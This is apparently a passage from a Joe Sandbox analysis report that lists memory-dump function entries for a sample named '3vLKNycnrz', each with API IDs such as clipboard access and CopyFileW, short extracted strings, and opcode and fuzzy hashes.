                                                        • Instruction Fuzzy Hash: E99235396093409AD315DF21C890BBFBBE2EBD6704F24882EE2C557352DB799C45CB46
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$CloseDataOpen
                                                        • String ID:
                                                        • API String ID: 2058664381-0
                                                        • Opcode ID: ed22625543cd6cbe4c61938bd6270a151eadf7f901f5a69968a458354b63d413
                                                        • Instruction ID: cd77b6b86ea3fad057bcf2ce912058e653a7b26ec882016760a9a5dd3841588a
                                                        • Opcode Fuzzy Hash: ed22625543cd6cbe4c61938bd6270a151eadf7f901f5a69968a458354b63d413
                                                        • Instruction Fuzzy Hash: B75124B2D08A918FE700AB78C84935ABFE1AB45300F05867DD89997382D37899588BD7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pr$pr$|C$stu
                                                        • API String ID: 0-3781844917
                                                        • Opcode ID: 41d49a1763fe52469dcbf448ad62cd4b7ca4673945f29148586fff256c62a002
                                                        • Instruction ID: 01b159c211fb57ca204574ba1aee21575a8bb29d263262e542e5f43b0d0d8542
                                                        • Opcode Fuzzy Hash: 41d49a1763fe52469dcbf448ad62cd4b7ca4673945f29148586fff256c62a002
                                                        • Instruction Fuzzy Hash: FDB1BBB5A00216DFCB00CF54D9816AABBB1FF4A310B1882A8D844DF356E3B8E951CFD5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BfD$(&B$,N;@$B>\0$EF$P2O4$t6GH
                                                        • API String ID: 0-3638485462
                                                        • Opcode ID: 3bfa644d511106c29585e5997b5b16d3f54ad53c9b6297e5ebb30188e6e4366f
                                                        • Instruction ID: d3488ee24b6fb1c2b90eccc6e9cd5233fee36bd8583c441fe1e3a9afb2e27a03
                                                        • Opcode Fuzzy Hash: 3bfa644d511106c29585e5997b5b16d3f54ad53c9b6297e5ebb30188e6e4366f
                                                        • Instruction Fuzzy Hash: 77512971D002209FDB15CF68C89166BBB72EB82310F66816CE815BF795DB758C02CBD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: m$mlkj$mlkj$mlkj$mlkj$mlkj
                                                        • API String ID: 2994545307-3608166878
                                                        • Opcode ID: bf0c6fe6ac3fd079f3363a373944b5e6a258b3e08f63ba39d0d4d6a9a5e4bb28
                                                        • Instruction ID: 3d83204929475d2243f35793712f265c1150c7b3cc80a7e3b3cdd320ce48e554
                                                        • Opcode Fuzzy Hash: bf0c6fe6ac3fd079f3363a373944b5e6a258b3e08f63ba39d0d4d6a9a5e4bb28
                                                        • Instruction Fuzzy Hash: 0432293960C2409FD715CF24C8506BFB7E2FF9A304F28492EE5C697252DB389942CB99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BhC$mlkj$"#d$fC
                                                        • API String ID: 0-1588649497
                                                        • Opcode ID: 0a951961818f4deef2a5dc80d74dd1fd7fba13dcb5c6d0f204d6eeafbeb5e776
                                                        • Instruction ID: 01b69275c66d40f68532354ebb2a4c5dcc00f28d52a01c540a03275d902fae9a
                                                        • Opcode Fuzzy Hash: 0a951961818f4deef2a5dc80d74dd1fd7fba13dcb5c6d0f204d6eeafbeb5e776
                                                        • Instruction Fuzzy Hash: 1D515575208301ABE7149F29DC92B6FB7E1EB8A308F04983DF58087382D7799C15D766
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *+$Z9:;$]5R7
                                                        • API String ID: 0-1782461210
                                                        • Opcode ID: 18317f73d4b20812587b15f1d8e783b2e86799ef8bff05252d0e068513a8142b
                                                        • Instruction ID: f3e337a824cacc6ba73b64c2a0d4bdd9619d61f0da174fd01dd171e9017f99f7
                                                        • Opcode Fuzzy Hash: 18317f73d4b20812587b15f1d8e783b2e86799ef8bff05252d0e068513a8142b
                                                        • Instruction Fuzzy Hash: CDD105715083018BD728CF25C8926ABB7F2FFD2350F19992DE4C58B394E7789849CB86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: =?$$
                                                        • API String ID: 0-4187781974
                                                        • Opcode ID: 912699e5b5a83eda740f84456a48b7eea04782f4ff5260ae1e234fab1a7b3f9b
                                                        • Instruction ID: 02130b947a74d38fc6f31402f909bc89a173168320cded222b6466677b06a2ff
                                                        • Opcode Fuzzy Hash: 912699e5b5a83eda740f84456a48b7eea04782f4ff5260ae1e234fab1a7b3f9b
                                                        • Instruction Fuzzy Hash: 17913431A083008BD718DE28E89157FB7E2EFDA310F15993EE59687391D739E806CB56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: [^$mlkj$r
                                                        • API String ID: 0-1669103348
                                                        • Opcode ID: 21e9d6ce220200bc9f185d709e92f6d5e6c3a4ce1628005c404ebdc8a80ffc3a
                                                        • Instruction ID: ef4a1bd29f2b91fadf10b969bcbb7c19a58179f01bb9ca66c101a2bf60e5b683
                                                        • Opcode Fuzzy Hash: 21e9d6ce220200bc9f185d709e92f6d5e6c3a4ce1628005c404ebdc8a80ffc3a
                                                        • Instruction Fuzzy Hash: C2B1027560D380DFD3049F28D89162EBBE2AF9A315F68896DF1C5873A1DB399940CB06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PA$bQA$mlkj
                                                        • API String ID: 0-4187677057
                                                        • Opcode ID: 61665537f678a7279439f67486d301fc68e7e742a4c3ab9a55f07ac3181458a1
                                                        • Instruction ID: 75354251b3903ef5e4615d9cd6dee5b584e0579d9b4b5e89aefee9135f14cca8
                                                        • Opcode Fuzzy Hash: 61665537f678a7279439f67486d301fc68e7e742a4c3ab9a55f07ac3181458a1
                                                        • Instruction Fuzzy Hash: 2A91E074908340DBD7209F14D891BABB7B4FFD6354F144A2DE4C98B391EB789981CB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: t$c$|x
                                                        • API String ID: 0-1736779163
                                                        • Opcode ID: b29248f8861ec8d9f9602d0609553e13db4ca6b245818f8b3d2a13e52ec70524
                                                        • Instruction ID: 2d2eb292849ed74914c57985dfe7e563ba50c5517b571c60e4d6b76e5462cd37
                                                        • Opcode Fuzzy Hash: b29248f8861ec8d9f9602d0609553e13db4ca6b245818f8b3d2a13e52ec70524
                                                        • Instruction Fuzzy Hash: 3C61946110C3828AD7058F79849036BFFE19FA3244F1844AEE4D5AB383C77AC909C76B
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: Wu
                                                        • API String ID: 3664257935-4083010176
                                                        • Opcode ID: 9876d0f5205f503ac3b31147c4fe603824ae2b152544d7ed90e633a4cdd92e7e
                                                        • Instruction ID: e22133d68aded2852b0909aadde07a96b9d846834dfa351e4256db85230899c3
                                                        • Opcode Fuzzy Hash: 9876d0f5205f503ac3b31147c4fe603824ae2b152544d7ed90e633a4cdd92e7e
                                                        • Instruction Fuzzy Hash: C3E1F43060C3E18BDB358F2594507BBBBE2AFA7304F48499DD4D99B282D7394505CB57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Trst$Y{|=$Y{|=
                                                        • API String ID: 0-3553150240
                                                        • Opcode ID: e1208d81fc8c85d3d270f4aa6328560ffbfdb63ed79d86d8aed19965aa8dd395
                                                        • Instruction ID: 82f041ac4fb129b52d92bc4e0e622a48d078b5b731897c74e1898028a5a03c1e
                                                        • Opcode Fuzzy Hash: e1208d81fc8c85d3d270f4aa6328560ffbfdb63ed79d86d8aed19965aa8dd395
                                                        • Instruction Fuzzy Hash: FC314EB3B883524FD314CE6A9CC175BB6A6EBC2310F19853DDC94DB2C8C978C9098796
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: f$mlkj
                                                        • API String ID: 2994545307-4173456272
                                                        • Opcode ID: aebeac2f28ea62f0a92b7820442da45eb91bc90caa3fa21c9929503bd5f20411
                                                        • Instruction ID: 4c64b292961e85984e0260191e1ac676076537f22ceb86e998aa14a7ac434346
                                                        • Opcode Fuzzy Hash: aebeac2f28ea62f0a92b7820442da45eb91bc90caa3fa21c9929503bd5f20411
                                                        • Instruction Fuzzy Hash: E82205766093408BD718DF28C89072FB7E2EBD9304F18992EE59287391DBB89C01CB46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: K$mlkj
                                                        • API String ID: 0-1140061560
                                                        • Opcode ID: 1d6bfe0ade3e1b2936bbf3a4a242d8750284956ea84133ede389f664190fa359
                                                        • Instruction ID: 363b53c9c5521adcf3d900203d92a6946cf5d5463fdaac247f25277884d8064d
                                                        • Opcode Fuzzy Hash: 1d6bfe0ade3e1b2936bbf3a4a242d8750284956ea84133ede389f664190fa359
                                                        • Instruction Fuzzy Hash: B6B14675508340CFD3219F28C8917EBBBE1EFDA304F14896EE5C997292CB789881C74A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: F\9B$mlkj
                                                        • API String ID: 2994545307-2714594616
                                                        • Opcode ID: 3365063483bee2ac306583c2baf79b07bbbbcb7d26c5fae637048a05ab631897
                                                        • Instruction ID: be976f136087c75d3cc836e5c26e94b7e2ecf4e77cd8df77255cab527dcbf281
                                                        • Opcode Fuzzy Hash: 3365063483bee2ac306583c2baf79b07bbbbcb7d26c5fae637048a05ab631897
                                                        • Instruction Fuzzy Hash: 43716936B143009BD7188E28C8D063FB792EBD9314F19993EE9C697352CB789C01C785
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: 0?>=$@
                                                        • API String ID: 2994545307-767217726
                                                        • Opcode ID: dfbfa5e810cbc1c442dc0c28e40b056708b57764c4ead53dd122222ae65697b0
                                                        • Instruction ID: 3a77c6d0a17759d827a259e03f83c43c51df96955c699b532ce1594c11df6c84
                                                        • Opcode Fuzzy Hash: dfbfa5e810cbc1c442dc0c28e40b056708b57764c4ead53dd122222ae65697b0
                                                        • Instruction Fuzzy Hash: EF412A71A043118BD714CF24DC9236BB7E1FF89328F15952DE499A73D0E739AC05878A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$_@A
                                                        • API String ID: 0-2073229136
                                                        • Opcode ID: 4f7b69d8f459d49f217a57f0a9a55fb221073e2a755645ee80ce746e9e99b0b7
                                                        • Instruction ID: 20cebdbf30a446673fd44ee1294e223774585645bfe6c1c4e55d4a684f4df4ae
                                                        • Opcode Fuzzy Hash: 4f7b69d8f459d49f217a57f0a9a55fb221073e2a755645ee80ce746e9e99b0b7
                                                        • Instruction Fuzzy Hash: FE41B3B66583518BD704DF29C45032BB7E2FFC9314F55692EE0C297390EB789906C74A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dgX`$l.ez
                                                        • API String ID: 0-4200491131
                                                        • Opcode ID: 38976c6c8fd57b5a5dff2b82f354488d86fc6c5a4443b8711867c831509930f6
                                                        • Instruction ID: 16014e50947f795ab7f1ded1fd4c39bf1763ff48be5190231d3e76ef80b60e05
                                                        • Opcode Fuzzy Hash: 38976c6c8fd57b5a5dff2b82f354488d86fc6c5a4443b8711867c831509930f6
                                                        • Instruction Fuzzy Hash: F61129B2B243104B83188F39895246BBBE6FBD4714F55AA2EF485D72D5DA34C9018B4A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: mlkj
                                                        • API String ID: 0-2192308396
                                                        • Opcode ID: d6f4f0f47d0673255fa7c80862eee9c0296267c3ab75495d4f089d34b48a5d4e
                                                        • Instruction ID: 4fda0442eaf16cfdb58ee7ca0d9d32f6ef43eb6d31cc4f2186888d54ac4ebee6
                                                        • Opcode Fuzzy Hash: d6f4f0f47d0673255fa7c80862eee9c0296267c3ab75495d4f089d34b48a5d4e
                                                        • Instruction Fuzzy Hash: 1BF1F0B8618200EBD7189F28EC51A7F77A2FBC7314F24453DF68157292DB389851CB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "#d
                                                        • API String ID: 0-3839902168
                                                        • Opcode ID: 431ceed54ffb1d3f46aeeef6a6bb40c873e136908d924a7128e289b97741c2a5
                                                        • Instruction ID: 73157a7711d009bcd06f5a510306ba94cc0283347fa46c6717ba919988dfc8bc
                                                        • Opcode Fuzzy Hash: 431ceed54ffb1d3f46aeeef6a6bb40c873e136908d924a7128e289b97741c2a5
                                                        • Instruction Fuzzy Hash: CEC15872B043209BD314DF25D88266BB3E1EFE1354F59842EE88697391E37CE945C39A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "
                                                        • API String ID: 0-123907689
                                                        • Opcode ID: a7395462c9b40f9162520095ee9b70401cb9ea7387a0b8a66ee37d5f957aa6c6
                                                        • Instruction ID: 7d1bc372287bb8c994caa66a517cec1fc081287e66e1cf6493d1feff302a8634
                                                        • Opcode Fuzzy Hash: a7395462c9b40f9162520095ee9b70401cb9ea7387a0b8a66ee37d5f957aa6c6
                                                        • Instruction Fuzzy Hash: 9EC13872B08320AFD725CE24E49076BB7E5AF85310F58892FE89587381E738DC45C79A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ab
                                                        • API String ID: 0-2659403885
                                                        • Opcode ID: 097a1a3a8c462d721d3d44d4419dfd969d492c84c4daff575817181de5b309e7
                                                        • Instruction ID: 18a04c35ed4d055262d839cc3bc541f9bc32cc4e9ff1edb58925424a302bf1d8
                                                        • Opcode Fuzzy Hash: 097a1a3a8c462d721d3d44d4419dfd969d492c84c4daff575817181de5b309e7
                                                        • Instruction Fuzzy Hash: 77A110B55483128BC724DF28CC917ABB7F1EF81354F08991EE8859B391E738DA44C79A
                                                        APIs
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 004266BC
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: CopyFile
                                                        • String ID:
                                                        • API String ID: 1304948518-0
                                                        • Opcode ID: c3d77a51a5f6ac69ea97a28b7c8e6bea60132e31677e8a2b4b91c57e8b71647e
                                                        • Instruction ID: 1b8f04ddaa5814a6cbb5ade05a88a5c9b4ece9b3b63a2574100f9b476be69e6c
                                                        • Opcode Fuzzy Hash: c3d77a51a5f6ac69ea97a28b7c8e6bea60132e31677e8a2b4b91c57e8b71647e
                                                        • Instruction Fuzzy Hash: E201B1B4A1D3A48AD334CFB4A84136FBAF0FB81300F51981DD0DDEB245CA3594029B4B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -
                                                        • API String ID: 0-2547889144
                                                        • Opcode ID: 6a03b1d3bde38c1db3f5bd674179172993d6ab1c2bf14e658b0dfc265fd588fb
                                                        • Instruction ID: 97bb20b4423c03195d9428c2b8de4988cd920e3b223c330c98d7dc07d578709b
                                                        • Opcode Fuzzy Hash: 6a03b1d3bde38c1db3f5bd674179172993d6ab1c2bf14e658b0dfc265fd588fb
                                                        • Instruction Fuzzy Hash: 1E813C72E046524BC7188D39CA5426BBBD29BC1720F19897EE8D6E73D5FD3CCC054689
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ;*y
                                                        • API String ID: 0-1171459767
                                                        • Opcode ID: c05d3b309990d23b44ea14d2579969a94c6e8c974d91ccb97fd8ea8654ed1f58
                                                        • Instruction ID: d1ae164922366f481b42436806e994f6f9cb586779525998b75cff8917e7baf9
                                                        • Opcode Fuzzy Hash: c05d3b309990d23b44ea14d2579969a94c6e8c974d91ccb97fd8ea8654ed1f58
                                                        • Instruction Fuzzy Hash: 1751257194C3108BD710DF24E8512ABB7F1EF96344F14882EE8C5AB351D335EA05CB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ;*y
                                                        • API String ID: 0-1171459767
                                                        • Opcode ID: b7e6639f8d68430d2013f887c9a0e29467e1d0de2b1894ed87235bfaef55bab7
                                                        • Instruction ID: 4a8378923a10179abfdcf8d4f58d01a5422faef1167b437de3f3b72c7bfba7ef
                                                        • Opcode Fuzzy Hash: b7e6639f8d68430d2013f887c9a0e29467e1d0de2b1894ed87235bfaef55bab7
                                                        • Instruction Fuzzy Hash: 1951157194C3108BD710DF25E8512ABB7F1EF96344F14882EE8C5AB355D339EA05CB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #^ZH
                                                        • API String ID: 0-3451035658
                                                        • Opcode ID: efd50c707f85ec63e43ab912c9c3ac510af843228c4a8d67cece31423f7e249c
                                                        • Instruction ID: 6e53c36a4cde5bd5420cabef97eb07ffa3a372199de788684453f48dba085fa0
                                                        • Opcode Fuzzy Hash: efd50c707f85ec63e43ab912c9c3ac510af843228c4a8d67cece31423f7e249c
                                                        • Instruction Fuzzy Hash: 925168B16083048BC715CF29C8927A7BBF2EFDA314F18855DE5C24B3A1E7788846C786
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "
                                                        • API String ID: 0-123907689
                                                        • Opcode ID: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                                        • Instruction ID: 930dfd45b4fa2bec9642a4af3bcb41e6d4051c7e6577fd2267599b9fd59d8c3c
                                                        • Opcode Fuzzy Hash: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                                        • Instruction Fuzzy Hash: F771F532B183754BD714CE2CE48032FB7E2ABC6710F99856EE4989B391D279DC45878A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: mlkj
                                                        • API String ID: 0-2192308396
                                                        • Opcode ID: bdd2853d5377ef34e8c20968da51bd23097842b2cd0ad12fa34c3e0e85bafc46
                                                        • Instruction ID: f8ae5d8343d9b1aa80c9852a5fe2960d14e2f68844d95912e96eaca9d7732302
                                                        • Opcode Fuzzy Hash: bdd2853d5377ef34e8c20968da51bd23097842b2cd0ad12fa34c3e0e85bafc46
                                                        • Instruction Fuzzy Hash: 6F4116396082009BC324CF2498916BFB3A2FB9A314F6A853DD58687252DF74E842875E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: mlkj
                                                        • API String ID: 0-2192308396
                                                        • Opcode ID: a6398e2ece7ed8a6015c5fde91152c587f0ef1711e00323671c57743c533801c
                                                        • Instruction ID: 6256f8090b9ba9f9775beeb535e844044b5f4af6feefb02fc07166a1e1a94ef9
                                                        • Opcode Fuzzy Hash: a6398e2ece7ed8a6015c5fde91152c587f0ef1711e00323671c57743c533801c
                                                        • Instruction Fuzzy Hash: 293107757083E08BD7289F28986177BF7E3EFC6304F68052DC5C597252D7395801878A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: kl
                                                        • API String ID: 0-2211745248
                                                        • Opcode ID: 8eef09741816d59fef0a0aa15018137c013723f26d4b133034aec7d0f0116a43
                                                        • Instruction ID: c18b8bdec8ff84d112db47bc58101b3ccbc2a492019f1cc289826d93695c47a4
                                                        • Opcode Fuzzy Hash: 8eef09741816d59fef0a0aa15018137c013723f26d4b133034aec7d0f0116a43
                                                        • Instruction Fuzzy Hash: A541DB7821C3428BC708CF64C85167BBBE2EF86305F04896DF4969B390E7398902CB1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: 0?>=
                                                        • API String ID: 2994545307-3891647100
                                                        • Opcode ID: 491e2af22c404aa182339118d37bafd851c3d795977766d08b3484434e46fbd2
                                                        • Instruction ID: ab13e43bc54a80428253f27eee9ef5cca8e65680e571e1142b06ff47657a74f2
                                                        • Opcode Fuzzy Hash: 491e2af22c404aa182339118d37bafd851c3d795977766d08b3484434e46fbd2
                                                        • Instruction Fuzzy Hash: 5031F934708300ABE7109B64DCD1B3BB7E5EB8A714F24692EE685772D1D638EC11874A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: mlkj
                                                        • API String ID: 0-2192308396
                                                        • Opcode ID: 7ffbc5b011448d8b76049ad0d55a926e67812119236ecc73dedc71b742fd3438
                                                        • Instruction ID: 2a8ffe774288475bb00133809967ebd477ab4145f046e2390917428ed8cd07ca
                                                        • Opcode Fuzzy Hash: 7ffbc5b011448d8b76049ad0d55a926e67812119236ecc73dedc71b742fd3438
                                                        • Instruction Fuzzy Hash: 1A012231649214CBC70C9F20EC2453FB372FB82324F64042CE64213651D73DAE159B8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Rf$%
                                                        • API String ID: 0-3069614662
                                                        • Opcode ID: cfe836549f02e627f3b2c11d7aa07307bad81d50d039852b202a3dd3900c5905
